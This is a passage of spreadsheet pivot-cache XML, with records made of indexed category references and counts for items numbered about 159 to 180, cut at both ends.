    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="159"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="159"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="159"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="160"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="160"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="160"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="160"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="160"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="161"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="161"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="161"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="161"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="162"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="162"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="163"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="163"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="163"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="164"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="164"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="164"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="79"/>
    <x v="165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="95"/>
    <x v="165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="222"/>
    <x v="165"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="165"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="50"/>
    <x v="165"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="165"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="166"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="166"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="166"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="167"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="167"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="167"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="167"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="167"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="167"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="167"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="167"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="72"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="40"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="168"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="168"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="168"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="168"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="168"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="168"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="168"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="168"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="168"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="169"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="169"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="169"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="169"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="169"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="169"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="169"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="170"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="170"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="170"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="171"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="171"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="25"/>
    <x v="171"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="22"/>
    <x v="171"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="171"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="171"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="171"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="172"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="172"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="172"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="151"/>
    <x v="172"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="140"/>
    <x v="172"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="172"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="172"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="172"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="27"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="29"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="40"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="29"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="187"/>
    <x v="173"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="205"/>
    <x v="173"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="173"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="174"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="174"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="174"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="174"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="174"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="174"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="174"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="175"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="175"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="175"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="90"/>
    <x v="175"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="175"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="176"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="176"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="176"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="176"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="176"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="176"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="176"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="176"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="176"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="17"/>
    <x v="176"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="114"/>
    <x v="176"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="290"/>
    <x v="176"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="176"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="176"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="177"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="177"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="35"/>
    <x v="177"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="45"/>
    <x v="177"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="360"/>
    <x v="177"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="177"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="178"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="178"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="178"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="19"/>
    <x v="178"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="178"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="178"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="178"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="178"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="179"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="179"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="179"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="179"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="179"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="179"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="179"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="180"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="180"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="180"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="180"/>
  </r>
  <r>
